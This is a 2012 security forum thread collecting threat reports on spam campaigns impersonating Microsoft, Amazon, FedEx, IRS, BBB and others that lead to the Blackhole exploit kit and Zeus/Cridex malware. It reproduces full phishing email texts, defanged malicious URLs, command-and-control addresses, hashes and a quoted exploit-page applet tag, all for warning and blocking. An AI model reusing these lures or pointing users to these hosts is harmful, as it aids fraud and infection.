View Full Version : SPAM frauds, fakes, and other MALWARE deliveries...
AplusWebMaster
2012-09-01, 17:57
FYI...
Fake MS email phish delivers Zeus via Java vuln ...
- https://isc.sans.edu/diary.html?storyid=14020
Last Updated: 2012-09-01 - "Thanks to Susan Bradley for reporting this to ISC.
We're receiving multiple reports of a phishing campaign using the template from a legitimate Microsoft email regarding Important Changes to Microsoft Services Agreement and Communication Preferences.
The legitimate version of this email is specific to a services agreement seen here*, per a change to Microsoft services as of 27 AUG. The evil version of this email will subject victim to a hyperlink that will send them to a Blackhole-compromised website, which will in turn deliver a fresh Zeus variant... (evil) email including the following header snippet:
Received: from [101.5.162.236] ([101.5.162.236]) by
inbound94.exchangedefender .com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166
A legitimate header snippet:
Received: from smtpi.msn .com ([65.55.52.232]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900)
101.5.162.236 is in China, 65.55.52.232 is Microsoft. The legitimate email will include a hyperlink for http://email.microsoft.com/Key-9850301.C.DLs15.C.KK.DlNkNK , which points to the above mentioned services agreement.
(Obfuscated to protect the innocent): The phishing mail will instead include a hyperlink to the likes of allseasons****.us, radiothat****.com, and likely a plethora of others. I assessed radiothat****.com and was redirected to 209.x.y.14 which is running the very latest Blackhole evil as described on 28 AUG by Websense in this post**.
Source code review of the web page served included <applet/code="ndshesa.ndshesf"/archive="Leh.jar"><param/nam=123 name=uid value="N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:
047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:
034:034:02:065:071:034"/></applet>
The VirusTotal link for Leh.jar is here(3), and the VirusTotal link for the Zeus variant offered is here(4)...
Contemplate disabling Java(5) until the -next- update(6) is released..."
* http://windows.microsoft.com/en-US/windows-live/microsoft-services-agreement
** http://community.websense.com/blogs/securitylabs/archive/2012/08/28/new-java-0-day-added-to-blackhole-exploit-kit.aspx
3) https://www.virustotal.com/file/2510b99d94446dccacc8809c07f74d0c09b185b5ae68705c8406210148358bc9/analysis/
File name: Leh.jar
Detection ratio: 8/42
Analysis date: 2012-09-01 05:28:51 UTC
4) https://www.virustotal.com/file/98bbe7548b6c51247bd2ef0bcf4f4ac45df9851a3dd9c5ceb5e04b9320c55645/analysis/1346461231/
File name: updateflashplayer.exe
Detection ratio: 6/42
Analysis date: 2012-09-01 01:00:31 UTC
5) http://krebsonsecurity.com/how-to-unplug-java-from-the-browser/
6) https://isc.sans.edu/diary.html?storyid=14017
___
101.5.162.236
101.5.0-255.*
inetnum: 101.5.0.0 - 101.5.255.255
netname: TSINGHUA-CN
country: CN
origin: AS4538
http://www.google.com/safebrowsing/diagnostic?site=AS:4538
... 231 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-09-02, and the last time suspicious content was found was on 2012-09-02... We found 27 site(s)... that infected 743 other site(s).
___
- https://krebsonsecurity.com/2012/08/java-exploit-leveraged-two-flaws/
"... If you want to test whether you’ve successfully disabled Java, check out Rapid7's page, http://www.isjavaexploitable.com/ ."
:sad: :mad:
AplusWebMaster
2012-09-04, 02:11
FYI...
Fake ‘Amazon order’ email exploits recent Java vuln ...
- http://community.websense.com/blogs/securitylabs/archive/2012/09/03/amazon-order-email-campaign-lead-to-blackhole-utilizing-new-java-vulnerability.aspx
03 Sep 2012 - "... Websense... has detected a new malicious email campaign purporting to be an order verification email from Amazon directing victims to a page containing the recent Java exploit. If successful, this exploit could allow the cyber-criminals behind this campaign to deliver further malicious payloads to the victim’s machine which, for example, could lead to the exfiltration of personal and financial data. Oracle have released an out-of-band patch for this Java vulnerability (Oracle release Java 1.7.0_07 to fix CVE-2012-4681*)... On 1st September, Websense... intercepted over 10,000 malicious emails with the subject ‘You Order With Amazon.com’ enticing the recipient to ‘click here’ to verify a fictitious order as shown in this sample:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Components.ImageFileViewer/CommunityServer.Blogs.Components.WeblogFiles.securitylabs/0447.Amazon1_2D00_1.jpg_2D00_550x0.jpg
Once the victim has clicked the link, they are redirected to an obfuscated page hosting the Blackhole Exploit Kit... an analysis of this file can also be found on VirusTotal**..."
* http://community.websense.com/blogs/securitylabs/archive/2012/08/30/oracle-release-java-1-7-0-07-to-fix-cve-2012-4681.aspx
** https://www.virustotal.com/file/2510b99d94446dccacc8809c07f74d0c09b185b5ae68705c8406210148358bc9/analysis/
File name: 9c5abf8889c34b3a36c6699b40ef6717c95ac6e1
Detection ratio: 12/42
Analysis date: 2012-09-03
:mad:
AplusWebMaster
2012-09-04, 15:27
FYI...
Another round of "Spot the Exploit E-Mail"
- https://isc.sans.edu/diary.html?storyid=14029
Last Updated: 2012-09-04 - "We have come to expect quality phishing/fake email work these days...
> https://isc.sans.edu/diaryimages/amexemail1.png
> https://isc.sans.edu/diaryimages/amexemail2.png
> https://isc.sans.edu/diaryimages/amexemail3.png
... javascript will then -redirect- the user to one of these two IP addresses:
96.47.0.163, 108.178.59.26
both IP addresses yield heavily obfuscated javascript. The wepawet analysis can be found here:
- http://wepawet.iseclab.org/view.php?hash=3c550bbf81ebfcd7979f2147fb69729c&type=js
It appears to be the usual "what vulnerable plugin are you running today?" javascript."
___
Fake Google email contains a trojan ...
- http://h-online.com/-1698349
04 Sep 2012 - "Unknown attackers are attempting to persuade email recipients to open attachments that contain a trojan by claiming to be from The Google Accounts Team. A new email supposedly from "accounts-noreply @google .com" with the subject "Suspicious sign in prevented" is being sent en masse -claiming- that a hijacker has attempted to access the mail recipient's Google Account. The message says that the sign-in attempt was prevented but asks users to refer to the attached file for details of the attempted intrusion. However, instead of containing information such as the IP address of the log-in attempt, the attached zip file contains a Windows executable file that will install a trojan onto a victim's system. While Google does sometimes send emails like this to users, they -never- contain attachments; users that receive such an email are advised to delete them. According to VirusTotal*, the trojan is currently only detected by just half of 42 anti-virus programs..."
* https://www.virustotal.com/file/df0b64f5d00af9da8adb4da3f72b559a517631cbd497c0ac03ccf81a256cc23a/analysis/
File name: Google_Accounts_Alert-3944-J5I-4169.zip
Detection ratio: 21/42
Analysis date: 2012-09-04 09:25:32 UTC
___
Fake ‘Wire Transfer Confirmation’ emails lead to Black Hole exploit kit ...
- http://blog.webroot.com/2012/09/04/spamvertised-wire-transfer-confirmation-themed-emails-lead-to-black-hole-exploit-kit/
Sep 4, 2012 - "Over the past 24 hours, cybercriminals started spamvertising millions of emails impersonating the United Parcel Service (UPS) in an attempt to trick end and corporate users into previewing a malicious .html attachment. Upon previewing it, a tiny iFrame attempts to contact a client-side exploits serving a landing URL, courtesy of the Black Hole web malware exploitation kit.
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/08/ups_wire_transfer_spam_email_malware_black_hole_exploit_kit.png
... Sample exploits served: CVE-2010-0188; CVE-2010-1885
Upon successful client-side exploitation, the campaign drops MD5: 7fe4d2e52b6f3f22b2f168e8384a757e * ..."
* https://www.virustotal.com/file/932fbd605ffa0dacc765b53236d2b29d34ab69c03c6562bd39dd32c4ef43fd00/analysis/
File name: 7fe4d2e52b6f3f22b2f168e8384a757e
Detection ratio: 32/42
Analysis date: 2012-08-28
___
Fake LinkedIn spam leads to malware ...
- http://blog.dynamoo.com/2012/09/linkedin-spam-1081785926-and.html
4 Sep 2012 - "This fake LinkedIn spam leads to malware on 108.178.59.26 and myasuslaptop .com:
Date: Tue, 04 Sep 2012 10:43:03 +0100
From: "noreply" [noreply@linkedin.com]
Subject: Link LinkedIn Mail
LinkedIn
REMINDERS
Invitation reminders:
• From Charlie Alexander (Mexico Key Account Director at Quanta)
PENDING MESSAGES
• There are a total of 5 messages awaiting your response. Visit your InBox now.
Don't want to receive email notifications? Adjust your message settings.
LinkedIn values your privacy. At no time has LinkedIn made your email address available to any other LinkedIn user without your permission. © 2012, LinkedIn Corporation.
The malicious payload (report here*)..."
* http://wepawet.iseclab.org/view.php?hash=879a57db29da2faa65185b6ce6b9c9ce&t=1346746065&type=js
Detection results
Detector Result
Jsand 2.3.4 malicious
In particular, the following URL was found to contain malicious content:
hxxp :// 108.178.59.26 /bv6rcs3v1ithi.php?w=6de4412e62fd13be
Exploits
Name Description Reference
HPC URL Help Center URL Validation Vulnerability CVE-2010-1885 ...
... My personal preference with any emails purporting to be from LinkedIn is to block them at the perimeter. As far as most businesses are concerned it is simply a playground for recruiters trying to poach your staff."
:mad: :mad:
AplusWebMaster
2012-09-05, 22:14
FYI...
Fake 'QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit
- http://blog.webroot.com/2012/09/05/intuit-themed-quickbooks-update-urgent-emails-lead-to-black-hole-exploit-kit/
Sep 5, 2012 - "... cybercriminals behind the recently profiled ‘Intuit Marketplace’ themed campaign resume impersonating Intuit, with a newly launched round consisting of millions of Intuit themed emails. The theme this time? Convincing users that in order to access QuickBooks they would have to install the non-existent Intuit Security Tool. In reality though, clicking on the links points to a Black Hole exploit kit landing URL that ultimately drops malware on the affected hosts...
Screenshot of a sample spamvertised email:
> https://webrootblog.files.wordpress.com/2012/08/intuit_spam_email_quickbooks_exploits_malware_black_hole_exploit_kit.png
... Client-side exploits serving URL: hxxp ://roadmateremove .org /main.php?page=9bb4aab85fa703f5 - 89.248.231.122; 208.91.197.27
... Name servers part of the campaign’s infrastructure:
ns1.chemrox .net – 208.91.197.27; 173.234.9.17
ns2.chemrox .net – 7.25.179.23
Upon successful client-side exploitation, the campaign drops MD5: f621be555dc94a8a370940c92317d575 * ...
* https://www.virustotal.com/file/eee04e6f165b8cd2fa455403a93f24acda2ff10c18df8e22850b881996338137/analysis/
File name: f621be555dc94a8a370940c92317d575
Detection ratio: 33/42
Analysis date: 2012-09-01
...Once executed, the sample phones back to 87.120.41.155 :8080/mx5/B /in. We’ve already seen the same command and control IP used in the following previously profiled malicious campaigns..."
:mad:
AplusWebMaster
2012-09-06, 15:09
FYI...
Bogus greeeting card emails serve exploits and malware
- http://blog.webroot.com/2012/09/06/cybercriminals-resume-spamvertising-bogus-greeeting-cards-serve-exploits-and-malware/
Sep 6, 2012 - "Remember the recently profiled 123greetings .com themed malicious campaign? It appears that over the past 24 hours, the cybercriminals behind it have resumed spamvertising millions of emails pointing to additional compromised URLs in a clear attempt to improve their click-through rates...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/123greetings_ecards_spam_exploits_malware_black_hole_exploit_kit.png
... Detection rate for a sample Java script redirection: MD5: 75e030e741875d29f12b179f2657e5fd* – ... Trojan.JS.Iframe.aby; Trojan.Webkit!html
Upon successful client-side exploitation, the campaign drops MD5: 864e1dec051cbd800ed59f6f91554597** – ... W32/Yakes.AP!tr
Once executed, the malware phones back to 216.38.12.158 :8080/mx/5/B/in... Another domain is known to have been responding to the same IP in the past..."
* https://www.virustotal.com/file/dcb5311abbbe703c457cbf387084a10dc6c022b9cd537fc184c005c32ff64ad2/analysis/1346492654/
File name: greetings.html
Detection ratio: 5/42
Analysis date: 2012-09-01
** https://www.virustotal.com/file/df923eade230bdfbcb0a11700464c5f9d7b9c2435fb99d842a6c8d7f6b0b1ffc/analysis/
File name: 97273d9507c8d78679c8cdf591715760aef0c59c
Detection ratio: 24/42
Analysis date: 2012-09-03
:mad:
AplusWebMaster
2012-09-06, 18:31
FYI...
$100 billion in losses to cybercrime ...
- http://h-online.com/-1701983
6 Sep 2012 - "According to Symantec's 2012 Norton Cybercrime Report*, worldwide, private individuals have suffered approximately $100 billion (more than £69 billion at the current exchange rate) in financial losses as a result of cybercrime. In the period from July 2011 to July 2012, losses averaged $197 (£124) per victim. A total of 556 million adults are reported to have fallen victim to malware, phishing or similar virtual crimes. The report claims that there are 1.5 million victims of cybercrime each day, or about 18 per second. The security specialist's report also states that two-thirds of internet users have been caught out by cybercriminals at some point in their lives, and almost half (46%) were victims during the period covered by the report... Around 40% of people don't use complex passwords or don't change their passwords regularly. There appears to be a clear trend of cybercriminals targeting social networks and mobile devices, with around 20% of users having suffered losses as a result of such attacks. The study also claims that 15% of social media accounts have been compromised and that 10% of users have fallen for fake links and scams on social networks. A total of 75% of those surveyed believe that cybercriminals are increasingly targeting social networking services. Losses within the EU are reported to amount to $16 billion (over £10 billion). China emerges as the country whose citizens have suffered the greatest financial loss – $46 billion (nearly £29 billion) – while Russia has the largest number of victims, with 92% of users surveyed in the country having experienced problems with cybercrime. The report surveyed more than 13,000 online adults aged 18-64 in 24 different countries."
* http://www.symantec.com/about/news/release/article.jsp?prid=20120905_02
Sept. 5, 2012
___
- http://yro.slashdot.org/story/12/09/06/1930218/norton-12-cybercrime-numbers-lower-than-last-years-but-just-as-bad
Sep 6, 2012
> http://blogs.cio.com/security/17375/norton-12-cybercrime-report-magically-makes-278b-damages-disappear
:mad::mad::mad:
AplusWebMaster
2012-09-08, 18:13
FYI...
FedEx spam ...
- http://blog.dynamoo.com/2012/09/fedex-spam-dusharenet-and-gsigallerynet.html
7 Sep 2012 - "Two fake FedEx campaigns... with different payload sites of dushare .net and gsigallery .net. In the first case, the malicious payload is... (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia). In the second case the payload is... (report here**) also hosted on 203.91.113.6..." (More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?hash=94186e5724f1780acc5667b51eea8af3&t=1347043407&type=js
Detector Result
Jsand 2.3.4 malicious
** http://wepawet.iseclab.org/view.php?hash=77da84ca6616c3ac4b001f713801007c&t=1347038935&type=js
Detector Result
Jsand 2.3.4 malicious
- http://google.com/safebrowsing/diagnostic?site=gsigallery.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 9 trojan(s), 1 scripting exploit(s)..."
- http://google.com/safebrowsing/diagnostic?site=dushare.net/
"Site is listed as suspicious... The last time Google visited this site was on 2012-09-07, and the last time suspicious content was found on this site was on 2012-09-07. Malicious software includes 2 trojan(s), 1 scripting exploit(s)..."
___
- http://blog.dynamoo.com/2012/09/fedex-spam-studiomonahannet.html
7 Sep 2012 - "... fake FedEx spam leads to malware on studiomonahan .net... The malicious payload is... (report here*) hosted on 206.253.164.43 (Hostigation, US)...
(More detail at the URL above.)
* http://wepawet.iseclab.org/view.php?hash=7e81471e8d284c0170db0388fdb21234&t=1346947943&type=js
Detector Result
Jsand 2.3.4 malicious
:mad:
AplusWebMaster
2012-09-09, 15:34
FYI...
Fake BBB email phish/Spam leads to malware
- https://isc.sans.edu/diary.html?storyid=14053
Last Updated: 2012-09-09 - "We received another piece of spam... pretending to be from the Better Business Bureau. Analysis of the file transferred (W6w8sCyj.exe) from prog .it appears to be a piece of malware (Win32/Cridex.Q) use to communicates via SSL with a C&C server... List of domains/IP to watch for and block:
ajaxworkspace .com, prog .it, la-liga .ro, ejbsa .com .ar, technerds .ca, 108.178.59.12
The email looks like this:
Better Business Bureau©
Start With Trust©
Sat, 08 Sep 2012 01:54:02 +0700
RE: Case # 78321602 <hxxp [:]//prog .it/EH564Bf/index.html>
Dear Sirs,
The Better Business Bureau has got the above mentioned complaint from one of your customers concerning their business relations with you. The details of the consumer's concern are contained in attached document. Please give attention to this case and advise us of your opinion as soon as possible. We encourage you to open the COMPLAINT REPORT to answer on this complaint.
We look forward to your prompt response.
Faithfully yours,
Ann Hegley
Dispute Counselor
Better Business Bureau
[1] http://anubis.iseclab.org/?action=result&task_id=15e0c40724f468154b9b07dba8a34bfa4&format=html
[2] http://wepawet.iseclab.org/view.php?hash=b4817d858b4e1862c8a828c85be365b1&t=1347109082&type=js
[3] http://wepawet.iseclab.org/view.php?hash=06ea2fd5b8931844981d7c718ea89060&t=1347109182&type=js
[4] http://wepawet.iseclab.org/view.php?hash=7d629a7fea394ce0be5782de592d8f68&t=1347109422&type=js
[5] https://www.virustotal.com/file/126ea9ed6828a1eaa37250aa015a9f8518fdb54c8175ce87559a68eac47b9187/analysis/
File name: vt_20541851.@
Detection ratio: 3/42
Analysis date: 2012-09-08
[6] http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32%2fCridex
:mad:
AplusWebMaster
2012-09-13, 16:26
FYI...
Fake US Airways email spam ...
- http://blog.dynamoo.com/2012/09/us-airways-spam-blue-lotusgrovenet.html
11 Sep 2012 - "A couple of samples of a fake US Airways spam email leading to malware on blue-lotusgrove .net:
Date: Tue, 11 Sep 2012 15:32:42 -0300
From: "US Airways - Reservations" [reservations @myusairways .com]
Subject: Please confirm your US Airways online registration...
Date: Tue, 11 Sep 2012 23:29:14 +0700
From: "US Airways - Reservations" [intuitpayroll @e.payroll.intuit .com]
Subject: US Airways online check-in...
The malicious payload is at [donotclick]blue-lotusgrove .net/main.php?page=559e008e5ed98bf7 (report here*) hosted on 203.91.113.6 (G Mobile, Mongolia), the same IP used in this attack**... domains on the same server... can all be considered to be malicious...
(More detail/URL list at the dynamoo URL above.)
* http://wepawet.iseclab.org/view.php?hash=d162970369a8c12845e64d8bbb9a96f1&t=1347388149&type=js
Detector Result
Jsand 2.3.4 malicious
** http://blog.dynamoo.com/2012/09/fedex-spam-dusharenet-and-gsigallerynet.html
___
- http://security.intuit.com/alert.php?a=57
Last updated 9/13/2012
:mad:
AplusWebMaster
2012-09-14, 17:04
FYI...
Fake ADP emails, voice mail notifications lead to Blackhole Exploit Kit
- http://community.websense.com/blogs/securitylabs/archive/2012/09/13/voice-mail-notifications-and-adp-emails-lead-to-blackhole-exploit-kit.aspx
13 Sep 2012 - "Since Blackhole Exploit Kit 2.0* was recently introduced, we wanted to give our readers a few examples of how they might get exposed to this threat through email. Websense... has recently intercepted a few malicious email campaigns that try to lure the victims to Web pages that host this popular exploit kit... One posed as voice mail notifications from Microsoft Exchange servers, another mimicked ADP invoice reminders, and a third thanked the recipient for signing up for a premium service of accountingWEB.com... A lot of the email messages pretend to come from trusted sources (well-known establishments, or the victim's own infrastructure), and try to catch the reader off-guard by focusing their attention on something urgent, like money matters... The malicious emails contain links that redirect to Blackhole pages with new obfuscation, but we don't think these are Blackhole 2.0. We suspect it won't be long, though, until we come across similar campaigns that use the new version. ADP is one the largest names in payroll services... Here's an example marked as high priority, with the subject line "ADP Invoice Reminder":
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/1854.mal_5F00_ADP_5F00_blur.jpg
... one of the possible redirection paths:
hxxp ://allbarswireless .com/HXwcDdQ/index.html
hxxp ://ash-polynesie .com/AjVSXvus/js.js
hxxp ://108.60.141.7 /tfvsfios6kebvras .php?r=dwtd6xxjpq8tkatb
hxxp ://108.60.141.7 /links/ differently-trace.php ...
Here's a different lure - emails pretending to come from the victim's Exchange server, telling them that they have new voice mail. The text invites the reader to click the link: "Double click on the link to listen the message." Subject lines include "Voice Mail from NNN-NNN-NNNN (NN seconds)":
>
http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/8015.ma_5F00_voice_5F00_mail_5F00_blur1.jpg
... redirection chain here is similar:
hxxp ://www.tryakbar .com/tLbM3r/index.html
hxxp ://sportmania .so/JP3q2538/js.js
hxxp ://173.255.221.74 /tfvsfios6kebvras .php?r=rs3mwhukafbiamcm ...
Another scheme thanks the user for signing up for a premium service. Subject lines include "Thank you for activating paid services":
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6431.mal_5F00_accountingweb_5F00_blur.jpg
Different redirection chain, but the landing page hosts Blackhole, with a very familiar path:
hxxp ://www.svstk. ru/templates/beez/check.php
hxxp ://bode-sales .net/main.php?page=3c23940fb7350489
And finally, the familiar theme of FDIC notifications claiming your wire transfer ability was suspended. Subject lines include "You need a new security version," "Suspended transactions," and "Urgent! You must install a new security version!"
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/6215.mal_5F00_FDIC_5F00_blur.jpg
Here again, simple redirection leads to typical "/main.php?page=" type URLs.
hxxp ://kahvikuppi .org/achsec.html
hxxp ://afgreenwich .net/main.php?page=0f123fe645ddf8d7
Note that as part of the update to Blackhole 2.0, we are much more likely to see URLs like those used in the first two examples, rather than the latter two, due to the dynamic URL generation capability."
* http://community.websense.com/blogs/securitylabs/archive/2012/09/13/blackhole-exploit-kit-updates-to-2-0.aspx
- https://isc.sans.edu/diary.html?storyid=14098
2012-09-14
ADP spam ...
- http://blog.dynamoo.com/2012/09/adp-spam-4624937122.html
13 Sep 2012 - "... fake ADP spam tries to load malware from 46.249.37.122... After clicking the link bouncing through a couple of redirectors, the victim ends up at [donotclick]46.249.37.122 /links/systems-links_warns.php which appears to be generating a 404 error (although it could be fake). This could be a legitimate but hacked server as it is also the IP address for a proxy service called dutchprox.com. In any case, you might decide you want to block the IP just in case."
- http://www.bbb.org/blog/wp-content/uploads/2012/09/scamalert1.jpg
Sep 12, 2012
___
- http://blog.commtouch.com/cafe/data-and-research/measuring-the-success-of-a-malware-campaign-2/
Sep 13, 2012
:fear::mad:
AplusWebMaster
2012-09-15, 21:45
FYI...
Fake Fedex email invoice lead to BlackHole Exploit kit
- http://blog.webroot.com/2012/09/14/spamvertised-your-fedex-invoice-is-ready-to-be-paid-now-themed-emails-lead-to-black-hole-exploit-kit/
Sep 14, 2012 - "... cybercriminals have launched yet another massive spam run, this time impersonating FedEx in an attempt to trick its customers into clicking on a malware and exploits-serving URL found in the malicious email...
Screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/09/fedex_spam_email_malware_exploits_black_hole_exploit_kit.png
... Sample client-side exploits serving URLs: hxxp ://studiomonahan .net/main.php?page=2bfd5695763b6536 (200.42.159.6, AS10481; 206.253.164.43, AS6921); hxxp ://gsigallery .net/main.php?page=2bfd5695763b6536 (208.91.197.54, AS40034)
Sample client-side exploits served: CVE-2010-1885
Detection rate for a sample Java script redirector: MD5: 32a74240c7e1a34a2a8ed8749758ef15* ...
JS/Iframe.FR; Trojan-Downloader.JS.Iframe.dbe; JS/Exploit-Blacole.hd
Upon successful client-side exploitation, the campaign drops MD5: f9904f305de002ad5c0ad4b4648d0ca7** ... Trojan.Win32.Obfuscated.aopm; Worm:Win32/Cridex.E
... and MD5: 0e2c968865d34c8570bb69aa6156b915*** Worm.Win32.Cridex.jb
The first sample phones back to 195.111.72.46 :8080/mx/5/B/in/ (AS1955) and to 87.120.41.155 :8080/mx/5/B/in (AS13147), and the second sample initiates DNS queries to droppinlever .pro; lambolp700tuning .ru and it also produces TCP traffic to 146.185.220.32 on port 443, as well as to 192.5.5.241 again on port 443.
... We’ve already seen numerous malicious campaigns phoning back one of these command and control servers, 87.120.41.155 :8080/mx/5/B/in in particular..."
* https://www.virustotal.com/file/ae6b98edb1b77700d28b94e53578a0a9bc2e3c0af12502f32d275c7cf2f32cb0/analysis/1347545788/
File name: Fedex.html
Detection ratio: 8/41
Analysis date: 2012-09-13
** https://www.virustotal.com/file/b4171c1e74779580958e530fc7174f672811d0bba2609050fd46dff2f5229ba0/analysis/
File name: f9904f305de002ad5c0ad4b4648d0ca7.malware
Detection ratio: 30/42
Analysis date: 2012-09-13
*** https://www.virustotal.com/file/cb66311a9af21e383d0b37573a3547cce66d278e0f3b984c150ec51e8c9a4a47/analysis/
File name: a36fc381c480e4e7ee09c89d950195c2
Detection ratio: 24/42
Analysis date: 2012-09-11
:fear: :mad:
AplusWebMaster
2012-09-18, 17:08
FYI...
Multiple fake emails/SPAM lead to malware...
"Photos" Spam...
- http://blog.dynamoo.com/2012/09/photos-spam-diareuomopru.html
18 Sept 2012 14:43 - "This spam leads to malware ondiareuomop .ru:
From: Carleen Garrett
Sent: Tuesday, September 18, 2012 3:17:33 PM
Subject: Photos
Hi,
as promised your photos - hxxp ://flyershot .com/gallery.htm
The payload is at [donotclick]diareuomop.ru:8080/forum/links/column.php hosted on the following IPs: 50.56.92.47, 203.80.16.81, 46.51.218.71
These IPs are a subset of the ones found here*. Block 'em if you can."
Fake Intuit email/Spam...
* http://blog.dynamoo.com/2012/09/intuitcom-spam-kerneloffceru.html
17 Sept 2012 22:41 - "This fake Intuit.com spam attempts to load malware from kerneloffce .ru:
Date: Mon, 17 Sep 2012 08:54:50 -0600
From: "Mason Jordan" [LillieRoell@digitalnubia.com]
Subject: Your Intuit.com software order.
Attachments: Intuit_Order_A49436.htm
Dear customer: Thank you for ordering from Intuit Market. We are processing and will message you when your order ships. If you ordered multiple items, we may sned them in more than one delivery (at no extra cost to you) to ensure quicker delivery. If you have questions about your order please call 1-900-130-1601 ($4.79/min).
ORDER INFORMATION
Please download your complete order id #1197744 from the attachment.(Open with Internet Explorer)
2012 Intuit, Inc. All rights reserved. Intuit, the Intuit Logo, Quickbooks, Quicken and TurboTax, among others, are registered trademarks of Intuit Inc.
The malicious payload is at kerneloffce .ru:8080/forum/links/column.php which was hosted on 46.51.218.71 (Amazon, Ireland) until it got nuked..."
> http://google.com/safebrowsing/diagnostic?site=kerneloffce.ru/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 1 trojan(s)... this site has hosted malicious software over the past 90 days. It infected 4 domain(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-spam-virtual-geocachingnet.html
17 Sept 2012 22:30 - "This spam leads to malware on virtual-geocaching .net:
Date: Mon, 17 Sep 2012 11:28:14 -0600
From: Internal Revenue Service [tangierss4 @porterorlin .com]
Subject: IRS report of not approved tax transfer
Your State Tax transfer (ID: 30062091798009), recently sent from your checking account was returned by Internal Revenue Service payment processing unit.
Not Accepted Tax transaction
Tax Transaction ID: 30062091798009
Reason of rejection See details in the report below
Federal Tax Transaction Report tax_report_30062091798009.doc (Microsoft Word Document)
Internal Revenue Service 3192 Aliquam Rd. Davis 71320 VA
The malicious payload is at [donotclick]virtual-geocaching .net/main.php?page=7de3f5c4200c896e (report here) on 203.91.113.6 (G Mobile, Mongolia) as used in this recent attack and several others..."
> http://google.com/safebrowsing/diagnostic?site=virtual-geocaching.net/
"Site is listed as suspicious - visiting this web site may harm your computer... the last time suspicious content was found on this site was on 2012-09-17. Malicious software includes 57 trojan(s), 8 exploit(s), 3 scripting exploit(s)..."
Fake IRS email/Spam...
- http://blog.dynamoo.com/2012/09/irs-spam-thebummwrapnet.html
17 Sept 2012 16:06 - "This fake IRS spam leads to malware on thebummwrap .net:
From: Internal Revenue Service [mailto:fascinatesh07 @deltamar .net]
Sent: 17 September 2012 15:30
Subject: Your federal tax transaction has been not accepted
Your State Tax transaction (ID: 60498447771657), recently initiated from your bank account was canceled by The Electronic Federal Tax Payment System.
Not Accepted Tax transaction
Tax Transaction ID: 60498447771657
Rejection code See details in the report below
Income Tax Transaction Report tax_report_60498447771657.doc (Microsoft Word Document)
Internal Revenue Service Ap #822-9450 Cum Avenue Edmond 33020 MI
The malicious payload is at [donotclick]thebummwrap .net/main.php?page=7de3f5c4200c896e hosted on 203.91.113.6 (G Mobile Mongolia) which has been used several times recently for evil purposes..."
___
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Last Updated September 18, 2012
:mad::mad:
AplusWebMaster
2012-09-18, 23:10
FYI...
Fake US Airways emails serve exploits and malware ...
- http://blog.webroot.com/2012/09/18/spamvertised-us-airways-reservation-confirmation-themed-emails-serve-exploits-and-malware/
Sep 18, 2012 - "Cybercriminals are currently spamvertising millions of emails impersonating U.S Airways, in an attempt to trick users into clicking on the malicious links found in the legitimately looking emails...
Sample screenshot of the spamvertised US Airways themed email:
> https://webrootblog.files.wordpress.com/2012/09/us_airways_spam_email_malware_exploits_black_hole_explot_kit.png
Sample client-side exploits served: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1885 - 9.3 (HIGH)
Responding to the same IP 203.91.113.6 (AS24559) ...
Detection rate for a sample Java script redirection: MD5: 5c5a3c6e91c1c948c735e90009886e37 *
... Mal/Iframe-W
Upon successful client-side exploitation, the campaign drops MD5: 9069210d0758b34d8ef8679f712b48aa **
... Trojan.Winlock.6049; W32/Cridex.R
Upon execution, the sample phones back to 199.71.213.194 :8080/mx/5/B/in/ (AS40676).
More MD5s are known to have phoned back to the same IP..."
* https://www.virustotal.com/file/08cb0d727f12e9dd77d18559a65a03c020c3c9c336457a51161d192cc91cfd6d/analysis/1347403787/
File name: Airways.html
Detection ratio: 3/42
Analysis date: 2012-09-11
** https://www.virustotal.com/file/c6c83420c4c2a64bd03463b6afd36b218aa6edb936c4ac15b9367669c354b59a/analysis/
File name: readme.exe
Detection ratio: 6/42
Analysis date: 2012-09-14
:mad:
AplusWebMaster
2012-09-19, 20:39
FYI...
Malicious UPS/FedEx emails re: iPhone 5 orders ...
- http://community.websense.com/blogs/securitylabs/archive/2012/09/18/watch-out-for-malicious-ups-fedex-notifications-when-waiting-for-iphone-5.aspx
18 Sep 2012 - "The first batch of iPhone 5s will be delivered on Friday of this week... From reading discussion forums online... all orders from Apple's online store will ship with UPS... when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3288.ups_5F00_notification_5F00_1.png
... the email contained an attached HTML page that, when loaded, displayed the page below:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/3704.ups_5F00_notification_5F00_browser.png
... the risk is great that recipients will have their guards down and will run the attached file... There's a hidden, obfuscated script on the page... it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC... the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails."
___
